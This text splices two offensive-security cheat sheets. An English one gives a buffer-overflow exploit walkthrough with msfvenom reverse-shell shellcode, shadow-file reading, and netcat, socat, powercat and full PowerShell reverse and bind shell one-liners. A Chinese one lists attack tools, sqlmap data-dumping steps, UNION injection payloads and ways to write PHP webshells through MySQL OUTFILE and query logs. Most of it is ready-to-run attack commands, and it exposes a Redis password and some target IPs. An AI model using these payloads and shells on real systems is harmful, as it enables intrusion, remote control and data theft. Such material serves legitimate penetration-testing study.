"\xa1\xa2\xa3\xa4\xa5\xa6\xa7\xa8\xa9\xaa\xab\xac\xad\xae\xaf\xb0" "\xb1\xb2\xb3\xb4\xb5\xb6\xb7\xb8\xb9\xba\xbb\xbc\xbd\xbe\xbf\xc0" "\xc1\xc2\xc3\xc4\xc5\xc6\xc7\xc8\xc9\xca\xcb\xcc\xcd\xce\xcf\xd0" "\xd1\xd2\xd3\xd4\xd5\xd6\xd7\xd8\xd9\xda\xdb\xdc\xdd\xde\xdf\xe0" "\xe1\xe2\xe3\xe4\xe5\xe6\xe7\xe8\xe9\xea\xeb\xec\xed\xee\xef\xf0" "\xf1\xf2\xf3\xf4\xf5\xf6\xf7\xf8\xf9\xfa\xfb\xfc\xfd\xfe\xff" ) ``` Remember: x00 is left out from the chars! ```python filler = "A" * <DETECTED-OFFSET> eip = "B" * 4 offset = "C" * 4 inputBuffer = filler + eip + offset + badchars ``` - After sending the badchars, follow ESP in Dump to see if a character did something unexpected - remove the character that breaks something from the badchars and rerun the script - determine all bad characters: e.g. "0x00, 0x0A, 0x0D, 0x25, 0x26, 0x2B, 0x3D" #### Redirecting the execution flow / Finding a return address - First guess: overwrite ESP ==> does not work, because this address changes every time the application runs - Use "JMP ESP"-instruction - find a static address for this instruction - librarys with ASLR support are not possible because address needs to be static - address must not include any of the bad characters - Find Information about modules with mona in Immunity Debugger: ```python !mona modules ``` - Find e.g. a DLL with Rebase, SafeSEH, ASL NXCompat OS Dll deactivated - Also the DLL must not contain any of the bad characters in its address - now find a "JMP ESP" instruction in the DLL - First wee need the OPCode for the instruction: ```bash msf-nasm_shell nasm > jmp esp 00000000 FFE4 jmp esp ``` - search for the instruction in before detected DLL: ```python !mona find -s "\xff\xe4" -m "<MODULENAME>" ``` - returns 1-n addresses (check if it/they contains bad characters) - Take address and use it with "Go to address in Disassembler" to verify if there's a "JMP ESP" instruction - Now use the address of the instruction to overwrite the EIP: ```python filler = "A" * 780 eip = "<ADDRESS IN REVERSE>" offset = "C" * 4 buffer = "D" * (1500 - len(filler) - len(eip) - len(offset)) inputBuffer = filler + eip + offset + buffer ``` **The address in the script needs to be in reverse.** E.g. you get the following address in immunity debugger for the JMP ESP instruction: 0x10090C83 This results in the following in your script: "\x83\x0c\x09\x10" - now set a breakpoint on the JMP ESP instruction and rerun exploit to verify that you reach the instruction - In the Debugger step into the JMP ESP instruction and you'll see the "D"s as new instructions #### generating a shellcode ```bash msfvenom -p windows/shell_reverse_tcp LHOST=<IP> LPORT=<IP> -f c -e x86/shikata_ga_nai -b "<BADCHARS>" ``` #### get the shell Shikata Ga Nai needs some space for decoding the payload. This decoding may overwrite some of the payload, so there is need for some space for this operation (NOPs). ```python shellcode = <OUTPUT FROM MSFVENOM> filler = "A" * 780 eip = "\x83\x0c\x09\x10" offset = "C" * 4 nops = "\x90" * 10 inputBuffer = filler + eip + offset + nops + shellcode ``` Now open your nc listener. ==> Congrats you got a shell! If you break the application on ending your shell: use EXITFUNC=thread on payload generation with msfvenom ### Create unique pattern Create a unique pattern to identify correct position for buffer overflow ```bash /usr/share/metasploit-framework/tools/exploit/pattern_create.rb -l <LENGTH> #Alternatively: msf-pattern_create -l <LENGTH> ``` ### Find unique pattern offset ```bash /usr/share/metasploit-framework/tools/exploit/pattern_offset.rb -l <LENGTH> -q <PATTERN> #Alternatively: msf-pattern_offset -l <LENGTH> -q <PATTERN> ``` # Local Enumeration ## Local Linux Enumeration ### Gather information about current user show username and groups of current user: ```bash id ``` ### System information/version Show information about kernel and linux system ```bash uname -a ``` - check for Kernel Exploits for the Kernel Show linux version ```bash cat /etc/issue ``` ### Find local users ```bash cat /etc/passwd ``` ### Password hashes ```bash cat /etc/shadow ``` ### Find world writable files ```bash find / -perm -2 ! -type l -ls 2>/dev/null ``` ### List services with systemctl ```bash systemctl list-unit-files ``` ## Local Windows Enumeration ### hosts file ```cmd type c:\windows\system32\drivers\etc\hosts ``` ### boot.ini file ```cmd type c:\boot.ini ``` ### Open Ports local ```cmd netstat -an ``` ### Check permission of executable ```cmd icacls <filename> ``` # Exploitation ## SSH Exploitation Try given Username + Password combinations on SSH with nmap ```bash nmap -p 22 --script ssh-brute --script-args userdb=userdb.lst,passdb=passdb.lst <IP> ``` ## Local Windows Exploitation ### Service Exploitation Dump full memory from service with Procdump ```cmd .\procdump.exe -ma <PROCESS ID> <Filename> ``` # Post Exploitation ## Netcat Fun Create netcat listener: ``` nc -nlvp <PORT> ``` Connect to port with netcat: ``` nc -nv <IP> <PORT> ``` ### Filetransfer File receiver: ``` nc -nlvp 4444 > <FILENAME> ``` File sender: ``` nc -nv <IP> <PORT> < <FILENAME> ``` ### Netcat Shell #### Bind Shell on Windows ```cmd nc -nlvp 4444 -e cmd.exe ``` #### Bind Shell on Linux ```bash nc -nlvp 4444 -e /bin/bash ``` #### Reverse Shell on Linux ```bash nc -nv <IP> <PORT> -e /bin/bash ``` #### Reverse Shell on Windows ```cmd nc -nv <IP> <PORT> -e cmd.exe ``` ## Socat Fun Connect to port with socat: ```bash socat - TCP4:<IP>:<PORT> ``` Create listener with socat: ```bash socat TCP-LISTEN:<PORT> STDOUT ``` ### File Transfer with socat File sender: ```bash socat TCP4-LISTEN:<PORT>,fork file:<FILENAME.xyz> ``` File receiver: ``` socat TCP4:<IP>:<PORT> file:<FILENAME>,create ``` ### Reverse Shell on Linux with socat Listener: ``` socat -d -d TCP4-LISTEN:<PORT> STDOUT ``` Shell: ``` socat TCP4:<IP>:<PORT> EXEC:/bin/bash ``` ### encrypted bind shell with socat ```bash # create (self signed) SSL certificate: openssl req -newkey rsa:2048 -nodes -keyout bind_shell.key -x509 -days 362 -out bind_shell.crt # combine key and cetificate to pem file cat bind_shell.key bind_shell.crt > bind_shell.pem # create encrypted listener socat OPENSSL-LISTEN:<PORT>,cert=bind_shell.pem,verify=0,fork EXEC:/bin/bash ``` connect to encrypted bind shell: ``` socat - OPENSSL:<IP>:<PORT>,verify=0 ``` ## Linux Post Exploitation ### Create tty console with python ```bash python -c 'import pty; pty.spawn("/bin/sh")' python -c 'import pty; pty.spawn("/bin/bash")' python -c 'import pty; pty.spawn("/bin/zsh")' ``` ```bash python3 -c 'import pty; pty.spawn("/bin/sh")' python3 -c 'import pty; pty.spawn("/bin/bash")' python -c 'import pty; pty.spawn("/bin/zsh")' ``` ### Cracking encrypted zip-file ```bash fcrackzip -u -D -p '/usr/share/wordlists/rockyou.txt' <zip-file-name> ``` ## Windows Post Exploitation ### Powershell Fun ```powershell Set-ExecutionPolicy Unrestricted Get-ExecutionPolicy ``` #### Powershell File Transfer ```cmd powershell -c "(new-object System.Net.WebClient).DownloadFile('http://<IP>:<PORT>/<FILE>','<TARGET-FILENAME>')" ``` #### Powershell Shells ##### Powershell Reverseshell ```powershell $client = New-Object System.Net.Sockets.TCPClient('<IP>', <PORT>); $stream = $client.GetStream(); [byte[]]$bytes = 0..65535|%{0}; while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0) { $data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0,$i); $sendback = (iex $data 2>&1 | Out-String ); $sendback2 = $sendback + 'PS ' + (pwd).Path + '> '; $sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2); $stream.Write($sendbyte,0,$sendbyte.Length); $stream.Flush(); } $client.Close(); ``` Same as Oneliner: ```cmd powershell -c "$client = New-Object System.Net.Sockets.TCPClient('<IP>', <PORT>);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0,$i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + 'PS ' + (pwd).Path + '> ';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush();}$client.Close();"" ``` ##### Powershell Bind Shell ```powershell $listener = New-Object System.Net.Sockets.TcpListener('0.0.0.0',<PORT>); $listener.start(); $client = $listener.AcceptTcpClient(); $stream = $client.GetStream(); [byte[]]$bytes = 0..65535|%{0}; while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0) { $data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes, 0, $i); $sendback = (iex $data 2>&1 | Out-String ); $sendback2 = $sendback + 'PS ' + (pwd).Path + '>'; $sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2); $stream.Write($sendbyte,0,$sendbyte.Length); $stream.Flush() } $client.Close(); $listener.Stop() ``` Same as Oneliner: ```cmd powershell -c "$listener = New-Object System.Net.Sockets.TcpListener('0.0.0.0',<PORT>);$listener.start();$client = $listener.AcceptTcpClient();$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes, 0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + 'PS ' + (pwd).Path + '>';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()}$client.Close();$listener.Stop()" ``` ### Powercat ```powershell # Load powercat script (only in current instance) PS> . .\powercat.ps1 ``` #### Powercat Filetransfer ```powershell PS> powercat -c <IP> -p <PORT> -i <FILENAME> ``` #### Powercat Reverse Shell ```powershell PS> powercat -c <IP> -p <PORT> -e cmd.exe ``` #### Powercat Bind Shell ```powershell PS> powercat -l -p <PORT> -e cmd.exe ``` #### Powercat Standalone Payloads Generate reverse shell payload with powercat: ``` # Payload generation: PS> powercat -c <IP> -p <PORT> -e cmd.exe -g > reverseshell.ps1 # Execute on target PC: PS> .\reversehell.ps1 ``` Generate (base64) encoded reverse shell payload with powercat: ``` PS> powercat -c <IP> -p <PORT> -e cmd.exe -ge > encodedreverseshell.ps1 # Execute: PS> powershell.exe -E <INSERT HERE BASE64 CONTENT OF GENERATED FILE> ``` ### Execute Powershell file, bypass all policies ```cmd powershell.exe -ExecutionPolicy Bypass -NoLogo -NonInteractive -NoProfile -File file.ps1 ``` ### RDP connection from Linux host to Windows target ```cmd rdesktop -u <User> -p <Password> <Target-IP> ``` # Docker Escape If you are root in a container, try to use the following tool: [https://github.com/PercussiveElbow/docker-escape-tool](https://github.com/PercussiveElbow/docker-escape-tool) # Stuff you also may need ## Bash scripting variables | Variable name | Description | |:---------------:|:-------------| |$0|name of bash script| |$1 - $9| first 9 arguments of bash script| |$#| number of arguments passed to script| |$@|all arguments passed to bash script| |$?|exist status of most recently run process| |\$\$|process id of current script| |$USER|username of user running the script| |$HOSTNAME|hostname of machine| |$RANDOM|a random number| |$LINENO|current line number in the script| ## Wireshark ### Display Filters ``` tcp.port == <PORT> ``` ## Tcpdump ### read pcap file ```bash tcpdump -r <FILENAME.pcap> ``` ### skip DNS lookup: ```bash tcpdump -n -r <FILENAME.pcap> ``` ### find most common ips ```bash tcpdump -n -r <FILENAME.pcap> | awk -F" " '{print $3}' | sort | uniq -c | head # gives Result: # <Number of Packets> <IP> ``` ### destination host filter ```bash tcpdump -n dst host <IP> -r <FILENAME.pcap> ``` ### port filter ```bash tcpdump -n port <PORT> -r <FILENAME.pcap> ``` ### print packet data as Hex and ASCII ```bash tcpdump -nX -r <FILENAME.pcap> ``` ## Crypto-Fun Attacking Weak RSA Keys: [https://github.com/Ganapati/RsaCtfTool](https://github.com/Ganapati/RsaCtfTool) ```bash python3 RsaCtfTool.py --publickey <PUBLIC KEY> --uncipherfile <CIPHERED FILE> ``` ## URL Encodings |encoded|symbol| |---------|-------| |%20| Space| |%21|!| |%22|"| |%23|#| |%24|$| |%25|%| |%26|&| |%27|'| |%28|(| |%29|)| |%2A|**| |%2B|+| |%2C|,| |%2D|-| |%2E|.| |%2F|/| |%3A|:| |%3B|;| |%3C|<| |%3D|=| |%3E|>| |%3F|?| |%40|@| |%5B|\[| |%5C|\| |%5D|]| |%7B|{| |%7C|\|| |%7D|}| ## Firefox Plugins you may need - Cookie-Editor - Foxy Proxy - Wappalyzer ## Tool Collection - axel - BurpSuite - dirb - dirbuster - DNSRecon - DNSenum - Docker Escapte Tool [https://github.com/PercussiveElbow/docker-escape-tool](https://github.com/PercussiveElbow/docker-escape-tool) - evil-winrm - fuff - fuzz faster u fool [https://github.com/ffuf/ffuf](https://github.com/ffuf/ffuf)4 - Immunity-Debugger (Windows) - mona - LinEnum [https://github.com/rebootuser/LinEnum](https://github.com/rebootuser/LinEnum) - LinPEAS - masscan - Metasploit - msf-pattern_create - msf-pattern_offset - msf-nasm_shell - nbtscan - nc / Netcat - nikto - nmap - onesixtyone - powercat - RsaCtfTool [https://github.com/Ganapati/RsaCtfTool](https://github.com/Ganapati/RsaCtfTool) - Searchsploit - snmpwalk - socat - tcpdump - theharvester - wireshark -
# attack_tool ### 1.dirmap web็›ฎๅฝ•ๆ‰ซๆๅทฅๅ…ท https://github.com/H4ckForJob/dirmap dirmap็š„ๅฎ‰่ฃ…ๆŒ‡ๅ— ```git clone https://github.com/H4ckForJob/dirmap.git && cd dirmap python3 -m pip install -r requirement.txt python3 dirmap.py -i http://192.168.31.200 -lcf ``` dirmap็š„ไฝฟ็”จๆ–นๆณ• ``` python3 dirmap.py -i https://target.com -lcf python3 dirmap.py -i 192.168.1.1 -lcf python3 dirmap.py -i 192.168.1.0/24 -lcf python3 dirmap.py -i 192.168.1.1-192.168.1.100 -lcf python3 dirmap.py -iF targets.txt -lcf ``` ### 2.ๅญๅŸŸๅๆ‰ซๆ subdomainbruteไธŽteemo็š„ไฝฟ็”จ ```site:oldming.top -www python subDomainsBrute.py oldming.top --full python2 teemo.py --help python2 teemo.py -d www.oldming.top ``` ### 3.waf่ฏ†ๅˆซ shadonๅ…ณ้”ฎ่ฏๆœ็ดข๏ผšX-Powered-By:WAF ```python main.py http://phw89.266933.com/``` ### 4.EXP่Žทๅ– POC ``` ./searchsploit wordpress 4.1 ๆœ็ดขๅŒๆ—ถๅธฆๆœ‰wordpressๅ’Œ4.1็š„ๆผๆดž ./searchsploit -s "wordpress 4.1" ๆ›ดไธฅๆ ผ็š„ๆœ็ดข ./searchsploit "WordPress 4.1" -j ไปฅjsonๆ ผๅผๆ˜พ็คบ่พ“ๅ‡บ็ป“ๆžœ ./searchsploit "WordPress 4.1" -o ๅ…่ฎธๆ ‡้ข˜ๆบขๅ‡บๅ…ถๅˆ— ./searchsploit "WordPress 4.1" -p ๆ˜พ็คบๆผๆดž็š„ๅฎŒๆ•ดๅœฐๅ€ ./searchsploit "WordPress 4.1" -w ๆ˜พ็คบ็ฝ‘็ปœๅœฐๅ€่€Œ้žๆœฌๅœฐๅœฐๅ€ ./searchsploit "WordPress 4.1" -u ๆ›ดๆ–ฐๆฃ€ๆŸฅๅนถๅฎ‰่ฃ…ไปปไฝ•ๆ•ฐๆฎๅบ“ๅŒ…ๆ›ดๆ–ฐ ./searchexploit wordpress -c ๅŒบๅˆ†ๅคงๅฐๅ†™ๆœ็ดข ./searchsploit "Landa Driving School Management System 2.0.1 - Arbitrary File Upload" ``` #### 5.pocsuite3่Žทๅ–poc ``` cd pocsuite && python cli.py -h ``` ### 6.xrayๆผๆ‰ซๅทฅๅ…ท ``` /xray_darwin_arm64 webscan --listen 127.0.0.1:7777 --html-output proxy.html ่ขซๅŠจๆ‰ซๆ /xray_darwin_arm64 webscan --url http://1.117.52.219:81/?a=b --html-output single-url.html ๅชๆ‰ซๆๅ•ไธชurl /xray_darwin_arm64 webscan --plugins cmd-injection,sqldet --url http://1.117.52.219:81/ /xray_darwin_arm64 webscan --plugins cmd-injection,sqldet --listen 127.0.0.1:7777 /xray_darwin_arm64 webscan --url http://example.com/?a=b \ --text-output result.txt --json-output result.json --html-output report.html ่พ“ๅ‡บๆ–‡ไปถ./xray_darwin_arm64 webscan --listen 127.0.0.1:7777 --html-output proxy.html ๅนถไธ”ๆต่งˆๅ™จ้…็ฝฎไปฃ็†ๅŽ๏ผŒ็”จๆต่งˆๅ™จ่ฎฟ้—ฎๆœ‰ๆผๆดž็š„็ฝ‘็ซ™ๆ—ถๅฐฑไผš่‡ชๅŠจๆ‰ซๆๅ…ถไธญ็š„ๆผๆดž ./xray_darwin_arm64 webscan --basic-crawler http://1.117.52.219:81/ --html-output vuln.html ็ˆฌ่™ซไธปๅŠจ ``` webๆผๆดžๆ‰ซๆๅ’Œ้ชŒ่ฏๅทฅๅ…ท: https://github.com/zhzyker/vulmap `python3 vulmap.py -u http://192.168.31.105:8081` ### 7.proxy_pool ็ˆฌ่™ซไปฃ็†ๆฑ ๆŠ€ๆœฏ https://github.com/jhao104/proxy_pool.git ้œ€่ฆๅ…ˆๅผ€ๅฏไธ€ไธชๆœ‰็ง˜ๅฏ†็š„redisๆœๅŠก๏ผŒๅนถไธ”ๅœจ่ฎพ็ฝฎไธญ้“พๆŽฅๆญคredis ###### Linux ``` python proxyPool.py schedule python proxyPool.py server pip3 install -r requirements.txt ``` ###### Mac ``` git clone https://github.com/jhao104/proxy_pool.git python3 -m pip install -r requirement.txt brew services start redis redis-cli config set requirepass chentuo0 config get requirepass auth test123 other: redis-cli -p 6379 -a chentuo0 && auth chentuo0 vim setting.py python proxyPool.py schedule pip3 install --upgrade Werkzeug==0.15.5 python proxyPool.py server http://127.0.0.1:5010/get/ ``` ่Žทๅ–ๅˆฐไปฃ็†ๆฑ ไธญ็š„ไปฃ็† ```print(requests.get("http://127.0.0.1:5010/get/").json().get("proxy"))``` ### 8.nosqlattack ๆ”ปๅ‡ปnosqlๆ•ฐๆฎๅบ“ ็Žฏๅขƒๅ‡†ๅค‡ ``` pip2 install CouchDB==1.0 httplib2 ipcalc==1.1.3 pbkdf2==1.3 shodan==1.5.3 pymongo==2.7.2 nose tornado sudo python2.7 setup.py install sudo python2.7 setup.py install ``` ๆณจๅ…ฅๆต‹่ฏ• ``` python2 main.py 2-1:http://192.168.31.200 2-3:/sqlilabs/Less-1/?id=1 x-4 ๅผ€ๅง‹ๆณจๅ…ฅ ``` ### 9.ๅธธ่ง้ซ˜ๅฑ็ซฏๅฃ 21/22/69 ftp/tftp๏ผšๆ–‡ไปถไผ ่พ“ๅ่ฎฎ ็ˆ†็ ด ๅ—…ๆŽข ๆบขๅ‡บ๏ผ›ๅŽ้—จ 22 ssh๏ผš่ฟœ็จ‹่ฟžๆŽฅ ็ˆ†็ ด OpenSSH๏ผ›28ไธช้€€ๆ ผ 23 telnet๏ผš่ฟœ็จ‹่ฟžๆŽฅ ็ˆ†็ ด ๅ—…ๆŽข 25 smtp๏ผš้‚ฎไปถๆœๅŠก ้‚ฎไปถไผช้€  53 DNS๏ผšๅŸŸๅ็ณป็ปŸ DNSๅŒบๅŸŸไผ ่พ“ DNSๅŠซๆŒDNS็ผ“ๅญ˜ๆŠ•ๆฏ’DNSๆฌบ้ช— ๆทฑๅบฆๅˆฉ็”จ๏ผšๅˆฉ็”จDNS้šง้“ๆŠ€ๆœฏๅˆบ้€้˜ฒ็ซๅข™ 67/68 dhcp ๅŠซๆŒ ๆฌบ้ช— 110 pop3 ็ˆ†็ ด 139 samba ็ˆ†็ ด ๆœชๆŽˆๆƒ่ฎฟ้—ฎ่ฟœ็จ‹ไปฃ็ ๆ‰ง่กŒ 143 imap ็ˆ†็ ด 161 snmp ็ˆ†็ ด 389 ldap ๆณจๅ…ฅๆ”ปๅ‡ป ๆœชๆŽˆๆƒ่ฎฟ้—ฎ 512/513/514 linux r ็›ดๆŽฅไฝฟ็”จrlogin 873 rsync ๆœชๆŽˆๆƒ่ฎฟ้—ฎ 1080 socket ็ˆ†็ ด๏ผš่ฟ›่กŒๅ†…็ฝ‘ๆธ—้€ 1352 lotus ็ˆ†็ ด๏ผšๅผฑๅฃไปค ไฟกๆฏๆณ„ๆผ๏ผšๆบไปฃ็  1433 mssql ็ˆ†็ ด๏ผšไฝฟ็”จ็ณป็ปŸ็”จๆˆท็™ปๅฝ• ๆณจๅ…ฅๆ”ปๅ‡ป 1521 oracle ็ˆ†็ ด๏ผšTNS ๆณจๅ…ฅๆ”ปๅ‡ป 2049 nfs ้…็ฝฎไธๅฝ“ 2181 zookeeper ๆœชๆŽˆๆƒ่ฎฟ้—ฎ 3306 mysql ็ˆ†็ ด ๆ‹’็ปๆœๅŠกๆณจๅ…ฅ 3389 rdp ็ˆ†็ ด ShiftๅŽ้—จ 4848 glassfish ็ˆ†็ ด๏ผšๆŽงๅˆถๅฐๅผฑๅฃไปค ่ฎค่ฏ็ป•่ฟ‡ 5000 sybase/DB2 ็ˆ†็ ด ๆณจๅ…ฅ 5432 postgresql ็ผ“ๅ†ฒๅŒบๆบขๅ‡บ ๆณจๅ…ฅๆ”ปๅ‡ป็ˆ†็ ด๏ผšๅผฑๅฃไปค 5632 pcanywhere ๆ‹’็ปๆœๅŠก ไปฃ็ ๆ‰ง่กŒ 5900 vnc ็ˆ†็ ด๏ผšๅผฑๅฃไปค ่ฎค่ฏ็ป•่ฟ‡ 6379 redis ๆœชๆŽˆๆƒ่ฎฟ้—ฎ ็ˆ†็ ด๏ผšๅผฑๅฃไปค 7001 weblogic Javaๅๅบๅˆ—ๅŒ– ๆŽงๅˆถๅฐๅผฑๅฃไปคๆŽงๅˆถๅฐ้ƒจ็ฝฒwebshell 80/443/8080 web ๅธธ่งwebๆ”ปๅ‡ป ๆŽงๅˆถๅฐ็ˆ†็ ดๅฏนๅบ”ๆœๅŠกๅ™จ็‰ˆๆœฌๆผๆดž 8069 zabbix ่ฟœ็จ‹ๅ‘ฝไปคๆ‰ง่กŒ 9090 websphereๆŽงๅˆถๅฐ ็ˆ†็ ด๏ผšๆŽงๅˆถๅฐๅผฑๅฃไปค Javaๅๅบๅˆ— 9200/9300 elasticsearch ่ฟœ็จ‹ไปฃ็ ๆ‰ง่กŒ 11211 memcacache ๆœชๆŽˆๆƒ่ฎฟ้—ฎ 27017 mongodb ็ˆ†็ ด ๆœชๆŽˆๆƒ่ฎฟ้—ฎ ### 10.sqlmapไฝฟ็”จๆ–นๆณ•(php5.4) ###### ๅธธ่ง„ๆณจๅ…ฅๆต็จ‹ ``` sqlmap -u http://aa.com/star_photo.php?artist_id๏ผ11 --batch sqlmap -u http://aa.com/star_photo.php?artist_id๏ผ11 --dbs sqlmap -u http://aa.com/star_photo.php?artist_id๏ผ11 --privilege ๆŸฅ็œ‹ๆƒ้™ sqlmap -u http://aa.com/star_photo.php?artist_id๏ผ11 --is-dba ๆŸฅ็œ‹ๆ˜ฏๅฆๆ˜ฏ้ซ˜ๆƒ้™็”จๆˆท sqlmap -u http://aa.com/star_photo.php?artist_id๏ผ11 -v 3 ๆ‰“ๅฐๅ‡บไบ†่ฏฆ็ป†็š„payload sqlmap -u http://aa.com/star_photo.php?artist_id๏ผ11 --current-db sqlmap -u http://aa.com/star_photo.php?artist_id๏ผ11 -D vhost48330 --tables sqlmap -u http://aa.com/star_photo.php?artist_id๏ผ11 -D vhost48330 -T admin --columns sqlmap -u http://aa.com/star_photo.php?artist_id๏ผ11 -D vhost48330 -T admin -C ac๏ผŒid๏ผŒpassword --dump ``` ###### ไปฅpostๆ–นๅผๆณจๅ…ฅๆต็จ‹ ``` python sqlmap.py -r post_test.txt -p name --current-db python sqlmap.py -r post_test.txt -p name -D note --tables python sqlmap.py -r post_test.txt -p name -D note -T fl4g --columns python sqlmap.py -r post_test.txt -p name -D note -T fl4g -C flag --dump post_test.txtไธบ้œ€่ฆpost็š„ๆ•ฐๆฎๅŒ…๏ผŒ-pไธบ้œ€่ฆๆณจๅ…ฅ็š„ๅ‚ๆ•ฐ็š„ๅๅญ—ไธบname ``` ###### ๆ‰‹ๅทฅๅธธ่ง„sqlmapๆณจๅ…ฅ็š„ๆ–นๆณ• ``` ?id='1 and 1=2 ' union select 1,2,3--+ ?id=' union select 1,database(),version()--+ ?id=' union select 1,group_concat(schema_name),3 from information_schema.schemata--+ ?id=' union select 1,table_name,group_concat(table_name) from information_schema.tables where table_schema='security'--+ ?id=' union select 1,column_name,group_concat(column_name) from information_schema.columns where table_name='users'--+ ?id=' union select 1,group_concat(username),group_concat(password) from security.users--+ ``` ###### ้˜ฒๆญขๆŸฅ่ฏขๆ—ถๅ‡บ็Žฐๅคง้‡ไธๅœจๅŒไธ€ๆ•ฐๆฎๅบ“ไธญ็š„้‡ๅคๅฑžๆ€ง๏ผš ``` ?id=' union select 1,group_concat(column_name),3 from information_schema.columns where table_name='users' and table_schema='pikachu'--+ ``` ###### sqlๆณจๅ…ฅ่ฏปๅ†™ๆ–‡ไปถ็š„ๅ‰ๆๆกไปถ show global variables like '%secure%'; ๆฒกๆœ‰ๅ…ทไฝ“ๅ€ผๆ—ถ๏ผŒ่กจ็คบไธๅฏนmysqld ็š„ๅฏผๅ…ฅ|ๅฏผๅ‡บๅš้™ๅˆถ ไฟฎๆ”นmysql.ini /my.iniๆ–‡ไปถ๏ผŒๅœจ[mysqld] ไธ‹ๅŠ ๅ…ฅsecure_file_priv =ไฟๅญ˜๏ผŒ้‡ๅฏmysqlๅฏๆ”นๅ˜้ป˜่ฎค็š„่ง„ๅˆ™ ###### sqlๆณจๅ…ฅ่ฏปๅ†™ๆ–‡ไปถ ``` ๆ‰‹ๅทฅ้€š่ฟ‡sqlๆณจๅ…ฅ่ฏปๅ†™ๆ–‡ไปถ: ?id=' union select 1,2,'<?php phpinfo();?>' into outfile 'c:/Users/Ninja/Desktop/etc/phpstudy/www/p.php'--+ ?id=' union select 1,2,load_file('c:/Users/Ninja/Desktop/etc/phpstudy/www/p.php')--+ sqlmap้€š่ฟ‡sqlๆณจๅ…ฅ่ฏปๅ†™ๆ–‡ไปถ: python sqlmap.py -u http://192.168.31.200/sqlilabs/Less-1/\?id\=1 --file-read 'c:/Users/Ninja/Desktop/etc/phpstudy/www/p.php' cat /Users/chentuo/.local/share/sqlmap/output/192.168.31.200/files/c__Users_Ninja_Desktop_etc_phpstudy_www_p.php python sqlmap.py -u http://192.168.31.200/sqlilabs/Less-1/\?id\=1 --file-write "/Users/chentuo/Public/tool/sqlmap_SQLๆณจๅ…ฅๅทฅๅ…ท/1.txt" --file-dest 'c:/Users/Ninja/Desktop/etc/phpstudy/www/2.txt' ``` ###### ็ช็ ดsecure_file_priv ้€‰้กน้™ๅˆถ๏ผŒ้€š่ฟ‡ๆ—ฅๅฟ—ๆฅๅ†™ๅ…ฅๅŽ้—จไปฃ็  ``` show variables like 'general_log%'; ๆŸฅ็œ‹ๆ—ฅๅฟ—็Šถๆ€๏ผˆ้ป˜่ฎค็ฆๆญข๏ผ‰ show variables like 'general_log%'; set global general_log = 'ON'; ๅผ€ๅฏๆ—ฅๅฟ—่ฎฐๅฝ• set global slow_query_log=1; set global general_log_file="C:/Users/Ninja/Desktop/etc/phpstudy/www/1.txt"; ไผช้€ (ไฟฎๆ”น)ๆ—ฅๅฟ—ๆ–‡ไปถ็š„็ปๅฏน่ทฏๅพ„ไปฅๅŠๆ–‡ไปถๅ set global slow_query_log_file='C:/Users/Ninja/Desktop/etc/phpstudy/www/2.txt'; select '<?php phpinfo() ?>'; ๆ‰ง่กŒsql่ฏญๅฅ๏ผŒmysqlไผšๅฐ†ๆ‰ง่กŒ็š„่ฏญๅฅๅ†…ๅฎน่ฎฐๅฝ•ๅˆฐๆˆ‘ไปฌๆŒ‡ๅฎš็š„ๆ–‡ไปถไธญ select '<?php phpinfo() ?>' or sleep(11); show global variables like '%long_query_time%'; ๅ‘ฝไปคๆ‰ง่กŒๆ—ถ้—ด่ถ…่ฟ‡long_query_time่ฎพๅฎš็š„ๅ€ผ(้ป˜่ฎค10s)๏ผŒๅˆ™ไผšไฟๅญ˜่‡ณๆ…ขๆŸฅ่ฏขๆ—ฅๅฟ— ``` ###### ๆ•ฐๆฎๅบ“ๆƒ้™ๅฏนSQLๆณจๅ…ฅ็š„ๅฝฑๅ“๏ผš ้€š่ฟ‡้—็•™็š„้…็ฝฎๆ–‡ไปถ็š„ๅ†…ๅฎนๅˆคๆ–ญๅฝ“ๅ‰ๆ•ฐๆฎๅบ“ๆ˜ฏroot่ฟ˜ๆ˜ฏๅ…ถไป–็”จๆˆท ๅฆ‚ๆžœๆ˜ฏ้ซ˜ๆƒ้™็”จๆˆท๏ผŒๅฏไปฅ็›ดๆŽฅ้€š่ฟ‡ๆ•ฐๆฎๅบ“่ฟ›่กŒๆ–‡ไปถ็š„่ฏปๅ†™๏ผŒๅฐ†webshellๅ†™ๅ…ฅ๏ผŒๅพ—ๅˆฐๅŽ้—จ ๅฆ‚ๆžœๆ˜ฏไฝŽๆƒ้™็”จๆˆท๏ผŒๅˆ™้œ€่ฆๅฐ†ๅˆ™ๅช่ƒฝ่ฟ›่กŒ่ฏปๆ•ฐๆฎ๏ผŒๆ‰พๅˆฐๅŽๅฐๅœฐๅ€๏ผŒๅฐ่ฏ•ๅœจๅŽๅฐไธญๅ†™ๅ…ฅๅŽ้—จ ###### ๅ…ถไป–ๆ•ฐๆฎๅบ“็š„ๆณจๅ…ฅๆ–นๅผ accessๆ•ฐๆฎๅบ“ไธๅญ˜ๅœจๆ–‡ไปถ่ฏปๅ†™๏ผŒไธๅญ˜ๅœจ่ฎฐๅฝ•ๆ•ฐๆฎๅบ“ๅ็š„่กจ๏ผŒๅชๆœ‰่กจ๏ผŒๅˆ—๏ผŒๆ•ฐๆฎไธ‰ๅฑ‚๏ผŒไนŸไธๅญ˜ๅœจ่ทจๆญฅๆณจๅ…ฅใ€‚ 